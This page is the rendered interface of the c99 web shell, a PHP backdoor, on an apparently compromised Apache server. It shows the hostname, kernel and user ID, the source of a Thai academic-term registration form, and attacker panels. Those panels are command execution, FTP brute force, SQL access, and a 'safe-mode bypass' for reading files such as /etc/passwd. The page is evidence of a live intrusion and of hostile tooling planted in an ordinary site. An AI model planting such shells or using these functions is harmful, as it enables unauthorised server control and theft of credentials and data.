!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addTermConfig.php (5.43 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//if(isset($_REQUEST["submit"])) print_r($_REQUEST);
?>

<!-- Modal Success -->
<div id="modalSuccess" class="modal">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header flex-column">
                <button type="button" class="btn-close" data-dismiss="modal" aria-label="Close"></button>
                <div class="icon-box">
                    <i class="bi bi-check-circle-fill" style="color:green; font-size:70px;"></i>
                </div><br />
                <h4 class="modal-title text-center">Success</h4>
            </div>
            <div class="modal-body text-center">
                <p>ดำเนินการสำเร็จ</p>
            </div>
            <div class="modal-footer justify-content-center">
                <button type="button" class="btn btn-secondary" onClick="javascript:window.location.href='./?page=addTermConfig';" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>

<div class="container">
    <p class="fs-3">เพิ่มข้อมูลปีการศึกษา</p>
    <form method="post" name="addTmcForm" id="addTmcForm" action="javascript:insertTmc();" class="row g-3 needs-validation" novalidate>
        <input type="hidden" class="form-control" name="action" value="insertTmc" />
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup01" class="input-group-text">ปีการศึกษา</label>
                <input type="number" class="form-control" name="tmcAcY" id="tmcAcY" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroupSelect02" class="input-group-text">ภาคการศึกษา</label>
                <select class="form-select" name="tmcTmId" id="tmcTmId" required>
                    <option selected disabled value="">-- เลือก --</option>
                    <?php
                    $sql "SELECT * FROM rg_Term";
                    $link->query($sql);
                    while ($data $link->getnext()) {
                        echo "<option value='" $data->tmId "'>" $data->tmName "</option>";
                    }
                    ?>
                </select>
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup01" class="input-group-text">วันที่เริ่มต้น</label>
                <input type="date" class="form-control" name="tmcFrDate" id="tmcFrDate" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup02" class="input-group-text">วันที่สิ้นสุด</label>
                <input type="date" class="form-control" name="tmcToDate" id="tmcToDate" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-12 text-center">
            <button class="btn btn-primary" id="btnAddTmcSubmit" type="submit" name="submit">Save</button>
        </div>
    </form>
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script>
    function insertTmc() {

        var $this = $("#btnAddTmcSubmit"); //submit button selector using ID
        var $caption = $this.html(); // We store the html content of the submit button
        var form = "#addTmcForm"; //defined the #form ID
        var formData = $(form).serializeArray(); //serialize the form into array
        //var route = $(form).attr('action'); //get the route using attribute action
        var route = "./api/termConfig.php";

        //alert("call insert function");

        // Ajax config
        $.ajax({
            type: "POST", //we are using POST method to submit the data to the server side
            url: route, // get the route value
            data: formData, // our serialized array data for server side
            beforeSend: function() { //We add this before send to disable the button once we submit it so that we prevent the multiple click
                $this.attr('disabled', true).html("Processing...");
            },
            success: function(response) { //once the request successfully process to the server side it will return result here
                $this.attr('disabled', false).html($caption);

                // Reload lists of employees
                //getDataAll();
                //window.location.href='./?page=editCurriculum';
                //$('#curStrucList').DataTable().ajax.reload();
                //$('#curStrucList').DataTable().destroy();
                //getCurStructureByCur();

                // We will display the result using alert
                //alert(response);

                // Reset form
                //resetForm(form);

                // Close modal
                //$('#addCurStruc').modal().hide();
                //$(".modal-backdrop").remove();
                //$('#addCurStruc').modal().toggle();
                //$(".modal-backdrop").remove();

                if (response == "Insert Success!!") $('#modalSuccess').modal().toggle();
                else alert(response);

            },

        });
    }

    (() => {
        'use strict'

        // Fetch all the forms we want to apply custom Bootstrap validation styles to
        const forms = document.querySelectorAll('.needs-validation')

        // Loop over them and prevent submission
        Array.from(forms).forEach(form => {
            form.addEventListener('submit', event => {
                if (!form.checkValidity()) {
                    event.preventDefault()
                    event.stopPropagation()
                }

                form.classList.add('was-validated')
            }, false)
        })
    })()
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--